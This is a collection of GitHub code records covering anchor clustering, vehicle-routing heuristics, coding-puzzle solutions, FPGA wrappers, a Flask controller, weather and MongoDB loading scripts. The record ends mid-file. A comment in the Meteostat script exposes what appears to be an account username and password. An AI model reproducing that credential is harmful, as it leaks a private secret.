np.random.seed()\n\n # the Forgy method will fail if the whole array contains the same rows\n clusters = boxes[np.random.choice(rows, k, replace=False)]\n\n iter_num = 1\n while True:\n #print(\"Iteration: %d\" % iter_num)\n sys.stdout.write(\"\\rIteration: %d: \" % iter_num)\n iter_num += 1\n\n distances = 1 - iou(boxes, clusters)\n nearest_clusters = np.argmin(distances, axis=1)\n\n if (last_clusters == nearest_clusters).all():\n break\n\n for cluster in range(k):\n if len(boxes[nearest_clusters == cluster]) == 0:\n print(\"Cluster %d is zero size\" % cluster)\n # to avoid empty cluster\n clusters[cluster] = boxes[np.random.choice(rows, 1, replace=False)]\n continue\n\n clusters[cluster] = dist(boxes[nearest_clusters == cluster], axis=0)\n\n last_clusters = nearest_clusters\n\n return clusters\n\ndef show_cluster(data, cluster, max_points=100):\n\t'''\n\tDisplay bouding box's size distribution and anchor generated in scatter.\n\t'''\n\tif len(data) > max_points:\n\t\tidx = np.random.choice(len(data), max_points)\n\t\tdata = data[idx]\n\tplt.scatter(data[:,0], data[:,1], s=5, c='lavender')\n\tplt.scatter(cluster[:,0], cluster[:, 1], c='red', s=100, marker=\"^\")\n\tplt.xlabel(\"Width\")\n\tplt.ylabel(\"Height\")\n\tplt.title(\"Bounding and anchor distribution\")\n\tplt.savefig(\"cluster.png\")\n\tplt.show()\n\ndef show_width_height(data, cluster, bins=100):\n\t'''\n\tDisplay bouding box distribution with histgram.\n\t'''\n\tif data.dtype != np.float32:\n\t\tdata = data.astype(np.float32)\n\twidth = data[:, 0]\n\theight = data[:, 1]\n\tratio = height / width\n\n\tplt.figure(1,figsize=(20, 6))\n\tplt.subplot(131)\n\tplt.hist(width, bins=bins, color='green')\n\tplt.xlabel('width')\n\tplt.ylabel('number')\n\tplt.title('Distribution of Width')\n\n\tplt.subplot(132)\n\tplt.hist(height,bins=bins, color='blue')\n\tplt.xlabel('Height')\n\tplt.ylabel('Number')\n\tplt.title('Distribution of Height')\n\n\tplt.subplot(133)\n\tplt.hist(ratio, bins=bins, color='magenta')\n\tplt.xlabel('Height / Width')\n\tplt.ylabel('number')\n\tplt.title('Distribution of aspect ratio(Height / Width)')\n\tplt.savefig(\"shape-distribution.png\")\n\tplt.show()\n\t\ndef sort_cluster(cluster):\n\t'''\n\tSort the cluster to with area small to big.\n\t'''\n\tif cluster.dtype != np.float32:\n\t\tcluster = cluster.astype(np.float32)\n\tarea = cluster[:, 0] * cluster[:, 1]\n\tcluster = cluster[area.argsort()]\n\tratio = cluster[:,1:2] / cluster[:, 0:1]\n\treturn np.concatenate([cluster, ratio], axis=-1)\n\ndef get_anchors(data,clusters=9):\n data = np.array(data)\n out = kmeans(data, k=clusters)\n out_sorted = sort_cluster(out)\n print(\"Accuracy: {:.2f}%\".format(avg_iou(data, out) * 100))\n\n #show_cluster(data, out, max_points=100)\n\n if out.dtype != np.float32:\n out = out.astype(np.float32)\n\n print(\"Recommanded aspect ratios(width/height)\")\n print(\"Width Height Height/Width\")\n for i in range(len(out_sorted)):\n print(\"%.3f %.3f %.1f\" % (out_sorted[i,0], out_sorted[i,1], out_sorted[i,2]))\n show_width_height(data, out, bins=100)","repo_name":"imistyrain/ssd-models","sub_path":"python/get_anchors.py","file_name":"get_anchors.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"21"} +{"seq_id":"34784836931","text":"#cython: language_level=3\nimport numpy as np\nimport random as r\nimport math\nimport heapq\nfrom proc_func2 import GenFunc\n\nclass GENIUS(GenFunc):\n def __init__(self, points, forbidden=[]):\n super().__init__(points)\n self.points = points\n self.offroute = list(range(0, len(points.time_cost)))\n for i in forbidden:\n self.offroute.remove(i)\n # self.history = []\n self.onroute = []\n self.p_neighborhood = {}\n self.edges = [None] * len(points.time_cost)\n self.route_cost = 0\n self.initialize()\n\n def swap(self, vertex):\n if vertex in self.offroute:\n self.onroute.append(vertex)\n self.offroute.remove(vertex)\n elif vertex in self.onroute:\n self.onroute.remove(vertex)\n self.offroute.append(vertex)\n \n def initialize(self):\n self.swap(0)\n v1 = r.choice(self.offroute)\n self.swap(v1)\n v2 = r.choice(self.offroute)\n self.swap(v2)\n self.edges[0] = v1\n self.edges[v1] = v2\n self.edges[v2] = 0\n self.route_cost = self.time_cost(self.edges)\n # self.history.append([self.edges])\n self.get_neighborhoods(5)\n\n def cycle(self):\n n = 3\n while self.offroute != []:\n chosen_vertex = r.choice(self.offroute)\n self.insert_vertex(chosen_vertex, self.edges)\n self.get_neighborhoods(5)\n n += 1\n print(f'+ {n}')\n\n def insert_vertex(self, vertex, edgeset, direction=False):\n possible_moves = {}\n move_key = 0\n vi = self.p_neighborhood[vertex]\n vj = self.p_neighborhood[vertex]\n if direction:\n direct = [edgeset]\n else:\n direct = [edgeset, self.reverse(edgeset, 0, 0)]\n for d_set in direct:\n for i in vi:\n if i == vertex:\n continue\n vi1 = self.find_successor(i, d_set)\n for j in vj:\n if j == vertex:\n continue\n if i == j:\n continue\n j_to_i = self.points_between(d_set, j, i)\n # except TypeError:\n # print(f'j: {j}')\n # print(f'i: {i}')\n # print(f'v: {vertex}')\n # print(f'vi: {vi}')\n # print(f'offroute: {self.offroute}')\n # print(f'onroute: {self.onroute}')\n # print('neighborhoods:')\n # print(self.p_neighborhood)\n # input('halt')\n i_to_j = self.points_between(d_set, i, j)\n vj1 = self.find_successor(j, d_set)\n vk = self.p_neighborhood[vi1]\n vl = self.p_neighborhood[vj1]\n for k in vk:\n if k == vertex:\n continue\n if j == k:\n continue\n if k not in j_to_i:\n continue\n possible_moves[move_key] = self.t1_string(d_set, i, j, k, vertex)\n move_key += 1\n for l in vl:\n if l == vertex:\n continue\n if i == l:\n continue\n if l not in i_to_j:\n continue\n if k != vj1 and l != vi1:\n possible_moves[move_key] = self.t2_string(d_set, i, j, k, l, vertex)\n move_key += 1\n min_pair = self.best_candidate(possible_moves)\n if direction:\n return possible_moves[min_pair[0]]\n else:\n self.swap(vertex)\n self.execute_move(possible_moves[min_pair[0]])\n possible_moves = {}\n return None\n\n def p_neighbors(self, vertex, p):\n distances = self.duration[vertex].copy()\n valid = []\n for i in range(0, len(distances)):\n if i != vertex and i in self.onroute:\n valid.append(distances[i])\n else:\n valid.append(math.inf)\n nearest = heapq.nsmallest(p, valid)\n neighbors = []\n for i in nearest:\n if i != math.inf:\n q = valid.index(i)\n neighbors.append(q)\n valid[q] = math.inf\n # for val in neighbors:\n # if val in self.offroute:\n # print(f'key: {vertex}, value: {neighbors}')\n # print(f'off: {self.offroute}')\n # print(f'on: {self.onroute}')\n # print(f'alleged valid: {valid}')\n # print(f'near: {nearest}')\n # for i in nearest:\n # if i != math.inf:\n # print(np.where(distances==i)[0][0])\n # input('halt')\n return neighbors\n\n def get_neighborhoods(self, p):\n for vertex in self.offroute:\n neighborhood = self.p_neighbors(vertex, p)\n self.p_neighborhood[vertex] = neighborhood\n for vertex in self.onroute:\n neighborhood = self.p_neighbors(vertex, p)\n self.p_neighborhood[vertex] = neighborhood\n # for k, v in self.p_neighborhood.items():\n # for value in v:\n # if value in self.offroute:\n # print(f'key: {k}, value: {v}')\n # print(f'off: {self.offroute}')\n # print(f'on: {self.onroute}')\n # input('halt')\n\n def execute_move(self, move):\n self.edges = move['frame']\n self.route_cost = move['cost']\n # self.history.append([self.edges])\n\n def post_opt(self):\n tau = self.edges.copy()\n zed = self.route_cost\n t = 1\n n = len(self.edges)\n print(f'Starting cost: {zed}')\n while t != n:\n if tau[t] == None:\n t += 1\n continue\n if tau[t] == 0:\n tau, zed = self.reinsert_vertex(0, tau)\n else:\n tau, zed = self.reinsert_vertex(t, tau)\n if zed < self.route_cost:\n self.edges = tau.copy()\n self.route_cost = zed\n print(f'Improvement to: {zed}')\n t = 1\n # self.history.append([self.edges])\n elif zed >= self.route_cost:\n t += 1\n\n def reinsert_vertex(self, vi, edgeset):\n possible_moves = {}\n move_key = 0\n for d_set in [edgeset, self.reverse(edgeset, 0, 0)]:\n vi1 = self.find_successor(vi, d_set)\n vip = self.find_predecessor(vi, d_set)\n vj = self.p_neighborhood[vi1]\n for j in vj:\n if j == vi:\n continue\n if j == vip:\n continue\n vj1 = self.find_successor(j, d_set)\n i1_to_j = self.points_between(d_set, vi1, j)\n j1_to_i = self.points_between(d_set, vj1, vi)\n vk = self.p_neighborhood[vip]\n for k in vk:\n if k == vi:\n continue\n if vip == k:\n continue\n if k in i1_to_j:\n move = self.t1_unstring(d_set, j, k, vi)\n if move:\n possible_moves[move_key] = self.insert_vertex(vi, move, direction=True)\n move_key += 1\n if k in j1_to_i:\n vk1 = self.find_successor(k, d_set)\n vl = self.p_neighborhood[vk1]\n j_to_k = self.points_between(d_set, j, k)\n for l in vl:\n if vi == l:\n continue\n if l not in j_to_k:\n continue\n if k != vj1 and l != vi1:\n move = self.t2_unstring(d_set, j, k, l, vi)\n if move:\n possible_moves[move_key] = self.insert_vertex(vi, move, direction=True)\n move_key += 1\n # if possible_moves == {}:\n # print([vi, j, k, l])\n # print(edgeset)\n min_pair = ['x', math.inf]\n for key in possible_moves.keys():\n if possible_moves[key] != None:\n if possible_moves[key]['cost'] <= min_pair[1]:\n min_pair = [key, possible_moves[key]['cost']]\n return possible_moves[min_pair[0]]['frame'], min_pair[1]","repo_name":"ah508/VRP","sub_path":"genius.py","file_name":"genius.py","file_ext":"py","file_size_in_byte":8970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70426121332","text":"from itertools import accumulate\n\n\nclass Solution:\n def shiftingLetters(self, s: str, shifts: list[int]) -> str:\n def shift(char, i):\n return chr((ord(char) - ord('a') + i) % (ord('z') - ord('a') + 1) + ord('a'))\n\n result = ''\n shifts = list(map(lambda x: x % (ord('z') - ord('a') + 1), list(accumulate(shifts[::-1]))[::-1]))\n print(shifts)\n for ch, n in zip(s, shifts):\n result += shift(ch, n)\n\n return result\n\n\ncases = [\n [\"abc\", [3, 5, 9]],\n [\"aaa\", [1, 2, 3]],\n [\"bad\", [10, 20, 30]], # jyh\"\n [\"abcd\", [3, 5, 9, 0]],\n]\n\nfor c in cases:\n print(Solution().shiftingLetters(*c))\n","repo_name":"Jeldo/PS","sub_path":"leetcode/solved/848.py","file_name":"848.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34583006148","text":"from turtle import width\nfrom migen import *\nfrom litex.soc.interconnect.csr import *\n\nimport math\n\n# Main module\nclass frame_buffer_SW(Module,AutoCSR):\n def __init__(self, DEBUG_READ_MODE=0):\n \n ##Parameters\n depth = 76800\n width = 15\n\n self.zero_signal = Signal() \n\n ## Inputs \n self.BUFFER_CLK = Signal()\n self.BUFFER_RESET = Signal()\n\n self.BUFFER_WRITE_CLK = Signal() #write addressing signals \n self.BUFFER_INPUT_PX_DATA = Signal(width) #write addressing signals \n self.BUFFER_WRITE_ADDR = Signal(math.ceil(math.log(depth,2))) #write addressing signals\n self.BUFFER_ENABLE_MEM = Signal()\n self.BUFFER_RQ_WRITE = Signal() #write control signals\n self.BUFFER_WRITING = Signal()\t #write control signals\t #write control signals\n \n ## Outputs\n self.BUFFER_OUTPUT_PX_DATA = Signal(width) #read addressing signals \n self.BUFFER_ACK_READ = Signal() #read control signals\n self.BUFFER_ACK_WRITE = Signal() #write control signals\n\n ## Internal Registers \n self.read_clk_reg = CSRStorage()\n self.output_px_data_reg = CSRStatus(15)\n self.read_addr_reg = CSRStorage(math.ceil(math.log(depth,2)))\n self.rq_read_reg = CSRStorage()\n self.reading_reg = CSRStorage() \n self.ack_read_reg = CSRStatus()\n\n ## Instances\n self.specials +=Instance(\"frame_buffer\",\n p_depth = depth,\n p_DEBUG_READ_MODE = DEBUG_READ_MODE,\n i_buffer_clk = self.BUFFER_CLK, \n i_reset = self.BUFFER_RESET,\n i_write_clk = self.BUFFER_WRITE_CLK, \n i_input_px_data = self.BUFFER_INPUT_PX_DATA,\n i_write_addr = self.BUFFER_WRITE_ADDR,\n i_enable_mem = self.BUFFER_ENABLE_MEM,\n i_rq_write = self.BUFFER_RQ_WRITE,\n i_writing = self.BUFFER_WRITING,\n o_ack_write = self.BUFFER_ACK_WRITE,\n i_read_clk = self.read_clk_reg.storage,\n i_read_addr = self.read_addr_reg.storage,\n o_output_px_data = self.BUFFER_OUTPUT_PX_DATA,\n i_rq_read = self.rq_read_reg.storage,\n i_reading = self.reading_reg.storage,\n o_ack_read = self.BUFFER_ACK_READ,\n )\n self.comb +=[\n self.zero_signal.eq(0),\n self.output_px_data_reg.status.eq(Cat(self.BUFFER_OUTPUT_PX_DATA[0:5],self.zero_signal,self.BUFFER_OUTPUT_PX_DATA[5:16])),\n self.ack_read_reg.status.eq(self.BUFFER_ACK_READ),\n ]\n ","repo_name":"DianaNatali/soc_image_preprocessing","sub_path":"hardware/frame_buffer/frame_buffer_SW.py","file_name":"frame_buffer_SW.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27826985071","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('AGG')\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\nfrom config import cfg\nimport net.processing.boxes3d as box3d\n\n\nif os.path.exists(cfg.LOG_DIR)==False: os.makedirs(cfg.LOG_DIR)\n\ndef imshow(name, image, resize=1):\n H,W,_ = image.shape\n cv2.namedWindow(name, cv2.WINDOW_NORMAL)\n cv2.imshow(name, image.astype(np.uint8))\n cv2.resizeWindow(name, round(resize*W), round(resize*H))\n\n\ndef normalise(image, limit=255.0):\n image -= image.min()\n image *= (limit/image.max())\n return image\n\ndef imsave(name, image,subdir=''):\n dir=os.path.join(cfg.LOG_DIR,subdir)\n os.makedirs(dir,exist_ok=True)\n plt.imsave(os.path.join(dir,name)+'.png' ,image)\n\ndef npsave(name,numpy_array):\n np.save(os.path.join(cfg.LOG_DIR,name),numpy_array)\n\ndef draw_box3d_on_camera(rgb, boxes3d, color=(255, 0, 255), thickness=1, text_lables=[]):\n projections = box3d.box3d_to_rgb_box(boxes3d)\n rgb = box3d.draw_rgb_projections(rgb, projections, color=color, thickness=thickness)\n font = cv2.FONT_HERSHEY_SIMPLEX\n for i,text in enumerate(text_lables):\n text_pos = (np.min(projections[i,:, 0]), max(np.min(projections[i,:, 1]), 15) )\n cv2.putText(rgb, text, text_pos, font, 0.7, (0, 255, 100), 1, cv2.LINE_AA)\n\n return rgb\n","repo_name":"bostondiditeam/MV3D","sub_path":"src/net/utility/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":456,"dataset":"github-code","pt":"21"} +{"seq_id":"71007233014","text":"\"\"\"\n해당 문제는 1208번 부분수열의 합2와 다르게 모든 무게가 양수이다.\n따라서 물건들로 만들 수 있는 합이 목표 값보다 작거나 같으면,\nfindSubSum에서 tmp_arr에 추가한다.\n\n그리고 1208번 처럼 Count를 사용하는 것보단, 이분 탐색을 이용한 것이 더 빠르다.\n그 이유는 1208번은 딱 알맞은 값을 고르는 것이고, 현재 문제는 범위를 고르는 문제인데,\nCounter를 사용하면 불필요한 범위를 반복하기 때문이다.\n\"\"\"\n\n#!/usr/bin/python\nimport sys\nfrom collections import Counter\n\ninput = sys.stdin.readline\n\ndef findSubSum(sub_sum, sub_arr, c):\n for basis in sub_arr:\n tmp_arr = []\n for element in sub_sum:\n tmp_sum = element + basis\n if tmp_sum <= c:\n tmp_arr.append(tmp_sum)\n sub_sum += tmp_arr\n\n\nn, c = map(int, input().split())\nstuff = list(map(int, input().split()))\n\nborder = n // 2\nstuff_a = stuff[:border]\nstuff_b = stuff[border:]\n\nsum_a, sum_b = [0], [0]\n\nfindSubSum(sum_a, stuff_a, c)\nfindSubSum(sum_b, stuff_b, c)\n\nsum_a.sort()\nsum_b.sort()\n\nleft, right = 0, len(sum_b) - 1\ncount = 0\n\nwhile left < len(sum_a) and right >= 0:\n if sum_a[left] + sum_b[right] <= c:\n count += right + 1\n left += 1\n else:\n right -= 1\n\nprint(count)","repo_name":"c0natus/Practice","sub_path":"Algorithm-practice/BaekJoon/Gold or higher/B1450.py","file_name":"B1450.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15855269191","text":"#!/usr/bin/env python3\n\nfrom flask import render_template\nimport sqlite3\n\n# import global config\nfrom ..config import conf\n\n# set blueprint object\nfrom flask import Blueprint\nblueprint = Blueprint('summary', __name__)\n\n\n@blueprint.route(\"/summary\")\ndef page_summary():\n\n # fetch data\n datasets = fetch_datasets_summary(conf[\"db_path\"])\n runs = fetch_runs_summary(conf[\"db_path\"])\n\n # page title\n page_title = \"Summary\"\n page_subtitle = (\n \"Here you will find the summary of all datasets and runs included \"\n \"in this output package. Click 'view' to see \"\n \"the detailed information of each run/dataset.\"\n )\n\n # render view\n return render_template(\n \"summary/main.html.j2\",\n page_title=page_title,\n page_subtitle=page_subtitle,\n datasets=datasets,\n runs=runs\n )\n\n\ndef fetch_datasets_summary(db_path):\n \"\"\" fetch datasets summary \"\"\"\n with sqlite3.connect(db_path) as con:\n datasets = []\n cur = con.cursor()\n for ds_id, ds_name, ds_desc in cur.execute(\n (\"select id,name,description\"\n \" from dataset\"\n \" order by name asc\")\n ).fetchall():\n # fetch genome counts\n genomes_count = cur.execute(\n (\"select count(distinct orig_folder)\"\n \" from bgc\"\n \" where dataset_id=?\"\n \" and orig_folder <> ''\"),\n (ds_id, )\n ).fetchall()[0][0]\n # fetch bgc counts\n bgc_count = cur.execute(\n (\"select count(id)\"\n \" from bgc\"\n \" where dataset_id=?\"),\n (ds_id, )\n ).fetchall()[0][0]\n # fetch bgc with taxonomy counts\n bgc_count_taxonomy = cur.execute(\n (\"select count(distinct bgc_id)\"\n \" from bgc,bgc_taxonomy\"\n \" where bgc.id=bgc_taxonomy.bgc_id\"\n \" and bgc.dataset_id=?\"),\n (ds_id, )\n ).fetchall()[0][0]\n datasets.append({\n \"id\": ds_id,\n \"count_genomes\": genomes_count,\n \"count_bgcs\": bgc_count,\n \"count_bgcs_with_taxonomy\": bgc_count_taxonomy,\n \"name\": ds_name,\n \"desc\": ds_desc\n })\n return datasets\n\n\ndef fetch_runs_summary(db_path):\n \"\"\" fetch runs summary \"\"\"\n with sqlite3.connect(db_path) as con:\n runs = []\n cur = con.cursor()\n run_status_enum = {\n row[0]: row[1] for row in cur.execute(\n (\"select id, name\"\n \" from enum_run_status\"\n \" order by id asc\")\n )\n }\n for run_id, run_status in cur.execute(\n (\"select run.id,run.status\"\n \" from run\"\n \" order by id asc\")\n ).fetchall():\n # fetch bgc counts\n bgc_count = cur.execute(\n (\"select count(bgc_id)\"\n \" from run_bgc_status\"\n \" where run_id=?\"),\n (run_id, )\n ).fetchall()[0][0]\n # fetch gcf counts\n if run_status >= 5: # CLUSTERING_FINISHED\n gcf_count = cur.execute(\n (\"select count(gcf.id)\"\n \" from gcf,clustering\"\n \" where gcf.clustering_id=clustering.id\"\n \" and clustering.run_id=?\"),\n (run_id, )\n ).fetchall()[0][0]\n # fetch threshold\n threshold = cur.execute((\n \"select threshold\"\n \" from clustering\"\n \" where run_id=?\"\n ), (run_id, )).fetchall()[0][0]\n else:\n gcf_count = \"n/a\"\n threshold = -1\n # fetch start time\n try:\n run_start = cur.execute(\n (\"select strftime('%Y-%m-%d %H:%M:%S', time_stamp)\"\n \" from run_log\"\n \" where run_id=? and message like 'run created %'\"),\n (run_id, )\n ).fetchall()[0][0]\n except IndexError:\n run_start = \"n/a\"\n # fetch end time\n try:\n run_finished = cur.execute(\n (\"select strftime('%Y-%m-%d %H:%M:%S', time_stamp)\"\n \" from run_log\"\n \" where run_id=? and message like 'run finished'\"),\n (run_id, )\n ).fetchall()[0][0]\n except IndexError:\n run_finished = \"n/a\"\n # fetch resumes\n run_resumes = [row[0] for row in cur.execute(\n (\"select strftime('%Y-%m-%d %H:%M:%S', time_stamp)\"\n \" from run_log\"\n \" where run_id=? and message like 'run resumed %'\"),\n (run_id, )\n ).fetchall()]\n # add to result\n run_name = \"run-{:04d}\".format(run_id)\n runs.append({\n \"id\": run_id,\n \"name\": run_name,\n \"start\": run_start,\n \"finished\": run_finished,\n \"resumes\": run_resumes,\n \"status\": run_status_enum[run_status],\n \"count_bgcs\": bgc_count,\n \"count_gcfs\": gcf_count,\n \"threshold\": float(\"{:.2f}\".format(threshold))\n })\n return runs\n","repo_name":"medema-group/bigslice","sub_path":"bigslice/modules/output/flask_app/app/controllers/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"4929592093","text":"\n\n\n# unnecessary...i forgot \ndef common_factors(l1, l2):\n common_elements = set(l1).intersection(set(l2))\n c1 = Counter(l1)\n c2 = Counter(l2)\n \n d = {}\n for key in common_elements:\n d[key] = min(c1[key], c2[key])\n return d\n","repo_name":"chirs/puzzles","sub_path":"tools/factors.py","file_name":"factors.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22146498796","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='plottingFunctions',\n version='0.0.1',\n author='Douglas F Porter',\n author_email='dfporter@gmail.com',\n description='Various plotting functions.',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url='https://github.com/dfporter/plottingFunctions',\n project_urls = {\n \"Bug Tracker\": \"https://github.com/dfporter/plottingFunctions/issues\"\n },\n license='MIT',\n packages=['plottingFunctions'],\n install_requires=['numpy', 'fastcluster', 'scikit-learn', 'scipy', 'pandas', 'adjustText'],\n)\n","repo_name":"dfporter/plottingFunctions","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36967166597","text":"from django.contrib import admin\n\nfrom shopify_install.models import Token\n\nclass TokenAdmin(admin.ModelAdmin):\n list_display = ['token', 'shop']\n list_filter = ['shop']\n search_fields = ['token', 'shop']\n\nadmin.site.register(Token, TokenAdmin)\n","repo_name":"igorsobreira/shopify_install","sub_path":"shopify_install/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72416592053","text":"from datetime import datetime\nfrom meteostat import Normals,Point\nimport matplotlib.pyplot as plt\nfrom meteostat import Stations, Monthly\nfrom geopy.geocoders import Nominatim\nimport csv\n# user name: maximkax,\n# password:Geo2555\"\nstations = Stations()\nstations = stations.nearby(42.3601,71.0589)\nstation = stations.fetch(1)\n\n\n#data = Normals(station, None, None)\n#list_of_places =[\"La Caleta, Dominican Republic\",\n# \"Santiago, Chile\",\n# \"South Andros, Sanctuary Blue Hole,\tBahamas\",\n# \"Alaska, western interior, Tochak McGrath, Upper Kuskokwim River,\tUSA\",\n# \"Abaco, Hopetown,\tBahamas\",\n# \"Uelen Chukotka, Russia\",\n# \"La Caleta,\tDominican Republic\"]\n\n\n#gn = geocoders.GeoNames(username= \"maximkax\")\n\nlocation_csv = \"../data/geo_locations/locations_test.csv\"\n\nlist_of_places = []\nwith open(location_csv, 'r') as file:\n csvreader = csv.reader(file)\n for row in csvreader:\n list_of_places.append(\"\".join(row))\n\n\nfor item in list_of_places:\n locator = Nominatim(user_agent=\"maximkax\")\n location = locator.geocode(item)\n try:\n print(\"****\")\n print(item, \" Latitude = {}, Longitude = {}\".format(location.latitude, location.longitude))\n stations = stations.nearby(location.latitude, location.longitude)\n station = stations.fetch(1)\n\n start = datetime(2010, 1, 1)\n end = datetime(2015, 12, 31)\n data = Monthly(station, start, end)\n data = data.fetch()\n print(\"average temperature : \", data[['tavg']].mean())\n print(\"average precipitation : \", data[['prcp']].mean())\n data.plot(y=['tavg', 'prcp'])\n plt.show()\n print(\"****\")\n except:\n print(\"WARNING : Location was not found\",item)\n\n","repo_name":"maksimkazanskii/DEEP_PATCH","sub_path":"src/meteo_test.py","file_name":"meteo_test.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34037442044","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport re\r\nimport pickle\r\nimport matplotlib.pyplot as plt\r\ntf.config.set_visible_devices([],'GPU')\r\n\r\n\r\nclass paraNetClass():\r\n def __init__(self):\r\n with open('dictf.pkl', 'rb') as f:\r\n self.dict_of_words = pickle.load(f)\r\n self.dictThemes = {0:':Кошки (животные);',\r\n 1:'UNIX-утилита cat для вывода содержимого файлов;',\r\n 2:'Версии операционной системы OS X, названные в честь семейства кошачьих.',}\r\n self.a = np.zeros([1,200])\r\n self.paraNET = tf.keras.models.load_model('ParaNet')\r\n self.nn_words=list()\r\n def text_analyse(self,text):\r\n text = re.split(\"[^a-z]\", text.lower()) \r\n\r\n\r\n\r\n for word in text:\r\n \r\n if (word in self.dict_of_words):\r\n self.nn_words.append(self.dict_of_words[word])\r\n \r\n\r\n\r\n\r\n for j, var in enumerate (self.nn_words):\r\n self.a[0,j] = self.nn_words[j]\r\n\r\n self.nn_words.clear()\r\n b=self.a.reshape(1,1,200)\r\n\r\n themes = self.paraNET.predict(b)\r\n\r\n #print(themes)\r\n\r\n arg = np.argmax(themes)\r\n\r\n theme = self.dictThemes[arg]\r\n\r\n return themes[0,0]\r\n \r\n\r\n\r\nparaNET = paraNetClass()\r\n\r\n\r\n\r\nwith open('sentences.txt', 'r') as fp:\r\n input_text = fp.readlines()\r\n\r\n\r\nprobabilities1 = list()\r\nprobabilities2 = list()\r\nprobabilities3 = list()\r\n\r\nn = np.linspace(1,20,20)\r\n\r\nfor str in input_text:\r\n result = paraNET.text_analyse(str)\r\n probabilities1.append(result[0])\r\n probabilities2.append(result[1])\r\n probabilities3.append(result[2])\r\n\r\n\r\nplt.bar(n,probabilities1, label ='Кошки')\r\nplt.bar(n,probabilities2 ,label ='UNIX Cat')\r\nplt.bar(n,probabilities3, label ='OS X')\r\nplt.legend(loc=4)\r\nplt.show()\r\n\r\n\r\n\r\n","repo_name":"razbiralochka/AI_LABS","sub_path":"AI_Labs/Laba1/ParaNET.py","file_name":"ParaNET.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25487379265","text":"import os\n\nimport pymongo\nimport json\nimport time\n# Establish connection\nclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\ndb = client[\"test\"] # Replace with your DB name\ncollection = db[\"players\"]\n\n'''file = open(\"../esports-data/players.json\", \"r\", encoding=\"utf-8\")\nplayer_data = json.load(file)\nfile = open(\"../esports-data/leagues.json\", \"r\", encoding=\"utf-8\")\nleagues = json.load(file)\nfile = open(\"../esports-data/tournaments.json\", \"r\", encoding=\"utf-8\")\ntournaments = json.load(file)\n\n# Check for empty values and throw errors\nfor record in player_data:\n for key, value in record.items():\n if not value and key != \"home_team_id\": # It's okay for home_team_id to be null, but not other fields\n raise ValueError(f\"Empty value detected for {key} in record {record['player_id']}\")\n\n# Insert data, skipping any duplicates\nfor record in player_data:\n if not collection.find_one({\"player_id\": record[\"player_id\"]}):\n try:\n collection.insert_one(record)\n except pymongo.errors.DuplicateKeyError:\n # This can be reached if there's a unique index constraint\n # (though you mentioned there's no need to create a unique index)\n print(f\"Duplicate player detected: {record['player_id']}\")\n else:\n print(f\"Duplicate player detected: {record['player_id']}\")\n\n# 1. Establish connection\ncollection = db[\"tournaments\"]\n\n# 2. Load the tournaments and leagues data & 3. Check the tournaments against the leagues data\nall_tournament_ids = {tournament['id'] for tournament in tournaments}\n\nleague_tournament_ids = set()\nfor league in leagues:\n for tournament in league['tournaments']:\n league_tournament_ids.add(tournament['id'])\n\nvalid_tournaments = [tournament for tournament in tournaments if tournament['id'] in league_tournament_ids]\n\n# 4. Insert valid tournaments into the MongoDB collection\nfor tournament in valid_tournaments:\n # Find the league name for this tournament\n for league in leagues:\n if any(t['id'] == tournament['id'] for t in league['tournaments']):\n tournament['league_name'] = league['name']\n break\n\n # Insert the tournament ensuring uniqueness using the tournament's id\n try:\n collection.update_one({'id': tournament['id']}, {\"$set\": tournament}, upsert=True)\n except pymongo.errors.DuplicateKeyError:\n print(f\"Duplicate tournament detected (ID: {tournament['id']}). Skipping...\")\n\nprint(\"Insertion complete.\")\n\ngames_collection = db[\"completed_games\"] # This is the collection where completed games_data will be stored\n\n# Query all tournaments\ntournaments = collection.find({})\n\n# Iterate through each tournament, then each stage, each section, and each match to extract game IDs\ngame_ids = []\n\n# Count the games_data that were not completed\nnot_completed_count = 0\nwhat = \"\"\nfor tournament in tournaments:\n tournament_name = tournament.get('slug')\n\n for stage in tournament.get('stages', []):\n for section in stage.get('sections', []):\n for match in section.get('matches', []):\n for game in match.get('games_data', []):\n if game.get('state') == \"completed\":\n game['tournament_name'] = tournament_name # Attach the tournament name to the game\n game['tournament_id'] = tournament['id']\n # Insert the game ensuring uniqueness using the game's id\n try:\n games_collection.update_one({'id': game['id']}, {\"$set\": game}, upsert=True)\n except pymongo.errors.DuplicateKeyError:\n print(f\"Duplicate game detected (ID: {game['id']}). Skipping...\")\n\n what = game.get('state')\n not_completed_count += 1\n game_id = game.get('id')\n if game_id:\n game_ids.append(game_id)\n# Print all the extracted game 